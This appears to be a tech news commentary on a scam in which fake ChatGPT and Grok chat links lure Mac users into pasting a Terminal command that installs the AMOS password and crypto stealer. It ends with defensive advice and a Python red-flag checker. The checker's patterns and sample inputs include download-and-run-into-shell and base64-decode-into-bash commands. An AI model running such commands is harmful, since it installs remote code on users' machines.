According to Tech Digest, cybersecurity researchers at Huntress have uncovered a new attack in which hackers impersonate chatbots like ChatGPT and Grok. They do this by “poisoning” shared chat-conversation links and then promoting those links through targeted Google ads. The scam targets users searching for common IT help, such as how to clear disk space on macOS. The fake AI chat offers seemingly helpful advice that involves pasting a single line of code into the Mac Terminal. That command secretly installs AMOS (Atomic macOS Stealer), malware designed to harvest passwords, browsing history, and cryptocurrency wallet information. Separately, OpenAI has acknowledged that its latest AI systems possess “high” hacking capabilities, underscoring the broader risk of misuse.

The Trust Trap

Here’s what makes this so insidious. We’re trained to be suspicious of random email attachments and strange software downloads. But advice from what looks like a legitimate ChatGPT conversation? That feels different. It feels productive: you’re just copying a line of code to fix a problem you actually have. The psychological bypass is brilliant, in a terrifying way. It turns our growing reliance on AI as a helpful, neutral tool into its exact opposite: a direct conduit for theft. And honestly, who hasn’t pasted a command from a forum or tutorial into their terminal without a second thought?

Why Macs Are a Target

You might notice the attack specifically uses a Mac Terminal command. That’s no accident. For years, there’s been a pervasive and somewhat naive belief that Macs are inherently safe from malware, which has left part of the user base less vigilant. Hackers know this. So they go where the fruit hangs low and the potential payoff is high: crypto wallets and saved passwords on machines often used by professionals. It’s a stark reminder that no platform is immune when the attack vector is human trust rather than a software flaw.



A Broader AI Security Nightmare

This may be just the beginning; the researchers expect the method to “proliferate.” Think about it. AI is being built into everything from search engines to the industrial panel PCs that control manufacturing floors. The principle is the same everywhere: if users trust the interface, they’ll follow its instructions. Now combine that with OpenAI’s own admission about the “high” hacking capabilities of its latest systems. We’re not just talking about fake chats anymore. We’re looking at a future where AI could be used to find vulnerabilities, craft hyper-personalized phishing lures, or even write its own malware. Defensive tools need to evolve at the same breakneck pace.

What Can You Do?

So what’s the fix? Blind trust is out; verification is in. Before you run any command, especially one that asks for admin rights or downloads something, take a beat. Can you find the same advice from multiple reputable sources? Does the request make logical sense for the problem you’re solving? For businesses, this is a major training moment: employees who use AI tools for coding help or troubleshooting need clear guidelines. In short, we have to treat AI interactions with the same caution we (should) apply to everything else on the internet. The AI isn’t your friend. It’s a tool, and now it’s a tool that attackers can dress up as a friend.
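Verification is mostly judgment, but a few of the red flags above are mechanical enough to sketch. The Python below is a minimal, hypothetical pre-paste check. It assumes that `sudo` (admin rights), `curl`/`wget` (downloads), piping output into a shell, and base64 decoding (a common way to hide what a command really does) deserve a second look. The pattern list and the `red_flags` name are illustrative inventions, not a Huntress tool or a reliable detector, and a determined attacker could easily evade them.

```python
import re

# Hypothetical red-flag patterns chosen for illustration only.
# This is NOT a complete or reliable malware detector.
RED_FLAGS = {
    "requests admin rights": re.compile(r"\bsudo\b"),
    "downloads something": re.compile(r"\b(curl|wget)\b"),
    "pipes output into a shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "decodes hidden content": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
}


def red_flags(command: str) -> list[str]:
    """Return the label of every red-flag pattern found in `command`, in dict order."""
    return [label for label, pattern in RED_FLAGS.items() if pattern.search(command)]


if __name__ == "__main__":
    examples = [
        "du -sh ~/Library/Caches",                         # inspects disk usage only
        "echo aGVsbG8= | base64 -d | bash",                # decodes text, then runs it
        "curl -fsSL https://example.com/install.sh | sh",  # downloads and runs a script
    ]
    for cmd in examples:
        print(cmd, "->", red_flags(cmd) or "no obvious red flags")
```

An empty result proves nothing; it only means none of these four patterns appeared. Any hit should be treated as a cue to stop and confirm the advice from another source before pressing Enter.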